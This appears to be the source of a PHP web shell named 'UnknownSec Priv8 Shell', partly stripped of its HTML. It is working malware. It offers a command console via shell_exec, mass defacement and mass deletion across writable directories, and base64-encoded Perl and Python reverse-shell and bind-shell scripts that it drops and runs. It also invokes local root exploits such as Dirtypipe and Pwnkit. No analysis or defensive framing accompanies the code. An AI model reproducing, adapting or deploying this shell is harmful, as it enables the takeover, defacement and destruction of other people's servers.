{ login }

UnknownSec Priv8 Shell

"; if(isset($_7['path'])){ $path = $_7['path']; chdir($path); }else{ $path = $gcw(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo ":/"; continue; } if($pat == '') continue; echo "".$pat."/"; } $scand = scandir($path); echo " [ ".w($path, p($path))." ]"; // info $sql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $pl = (exe('perl --help')) ? "ON" : "OFF"; $py = (exe('python --help')) ? "ON" : "OFF"; $disfunc = @ini_get("disable_functions"); $kernel = php_uname(); $phpver = PHP_VERSION; $phpos = PHP_OS; $soft = $_SERVER["SERVER_SOFTWARE"]; $ip = gethostbyname($_SERVER['HTTP_HOST']); if (empty($disfunc)) { $disfc = "NONE"; } else { $disfc = "$disfunc"; } if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; echo "

$disfc

Upload Mass deface Mass delete Console

Scan root Network Logout

"; // tools if(isset($_7['dir'])) { $dir = $_7['dir']; chdir($dir); } else { $dir = $gcw(); } $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); for($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if($i != $c_dir) { } // mass deface if($_7['id'] == 'deface'){ function mass_all($dir,$namefile,$contents_sc) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc.'/'.$namefile; if($dirb === '.') { file_put_contents($▚, $contents_sc); } elseif($dirb === '..') { file_put_contents($▚, $contents_sc); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[] $▚
"; file_put_contents($▚, $contents_sc); $▟ = mass_all($dirc,$namefile,$contents_sc); } } } } } } function mass_onedir($dir,$namefile,$contents_sc) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc.'/'.$namefile; if($dirb === '.') { file_put_contents($▚, $contents_sc); } elseif($dirb === '..') { file_put_contents($▚, $contents_sc); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[] $dirb/$namefile
"; file_put_contents($▚, $contents_sc); } } } } } } if($_7['start']) { if($_7['tipe'] == 'mass') { mass_all($_7['d_dir'], $_7['d_file'], $_7['script']); } elseif($_7['tipe'] == 'onedir') { mass_onedir($_7['d_dir'], $_7['d_file'], $_7['script']); } } s(); echo "

"; } // mass delete if($_7['id'] == 'delete'){ function mass_delete($dir,$namefile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc.'/'.$namefile; if($dirb === '.') { if(file_exists("$dir/$namefile")) { unlink("$dir/$namefile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namefile")) { unlink("".dirname($dir)."/$namefile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($▚)) { echo "[] $▚
"; unlink($▚); $▟ = mass_delete($dirc,$namefile); } } } } } } } if($_7['start']) { mass_delete($_7['d_dir'], $_7['d_file']); } s(); echo "

"; } // phpinfo if($_7['id'] == 'phpinfo'){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $front = strpos($buff,"")+6; $end = strpos($buff,""); echo "

".substr($buff,$front,$front-$front)."

"; exit; } // network if($_7['id'] == 'network'){ s(); echo "

"; if($_7['bpl']){ $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen('bp.pl','w'); fwrite($brt,$bp); $out = exe("perl bp.pl ".$_7['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "

$out\n".exe("ps aux | grep bp.pl")."

"; unlink("bp.pl"); } if($_7['bc'] == 'perl'){ $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen('bc.pl','w'); fwrite($plbc,$bc); $out = exe("perl bc.pl ".$_7['server']." ".$_7['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "

$out\n".exe("ps aux | grep bc.pl")."

"; unlink("bc.pl"); } if($_7['bc'] == 'python'){ $bc_py = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen('bcpy.py','w'); fwrite($pbc_py,$bc_py); $out_py = exe("python bcpy.py ".$_7['server']." ".$_7['port']); sleep(1); echo "

$out_py\n".exe("ps aux | grep bcpy.py")."

"; unlink("bcpy.py"); } echo "

"; } // console if($_7['id'] == 'cmd') { s(); if(!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd'].' 2>&1'); } echo "

"; if($cmd): echo '

~$ '.htmlspecialchars($_POST['cmd']).'
'.htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8').'

'; elseif(!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'): echo '

No result

'; endif; } // mulltiple upload if($_7['id'] == 'upload'){ s(); if(isset($_7['upl'])){ $result = count($_FILES['file']['name']); for($contents=0;$contents<$result;$contents++){ $namefile = $_FILES['file']['name'][$contents]; $up = @copy($_FILES['file']['tmp_name'][$contents],"$path/".$namefile); } if($result < 2){ if($up){ echo "Upload $namefile ok! ".ok()."

"; }else{ echo 'Upload fail! '.er().'

Netfilter : '.exe_root("timeout 10 ./rooting/netfilter", $path).'Ptrace : '.exe_root("echo id | timeout 10 ./rooting/ptrace", $path).'Sequoia : '.exe_root("timeout 10 ./rooting/sequoia", $path).'OverlayFS : '.exe_root("echo id | timeout 10 ./overlayfs", $path."/rooting").'Dirtypipe : '.exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path).'Sudo : '.exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path).'Pwnkit : '.exe_root("echo id | timeout 10 ./pwnkit", $path."/rooting").'

name	type	last edit	size	owner/group	permsion
..
$_d	dir	$dt	-	$downer/$dgrp	"; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo p($path.'/'.$dir); if(is_writable($path.'/'.$dir) \|\| !is_readable($path.'/'.$dir)) echo '
$_f	file	$ft	".sz(filesize($file))."	$fowner/$fgrp	"; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo p($path.'/'.$file); if(is_writable($path.'/'.$file) \|\| !is_readable($path.'/'.$file)) echo '

name

type

last edit

size

owner/group

permsion

action

$_d

dir

$dt

$downer/$dgrp

"; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo p($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '

$_f

file

$ft

".sz(filesize($file))."

$fowner/$fgrp

"; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo p($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '

UnknownSec Priv8 Shell

Back-Connect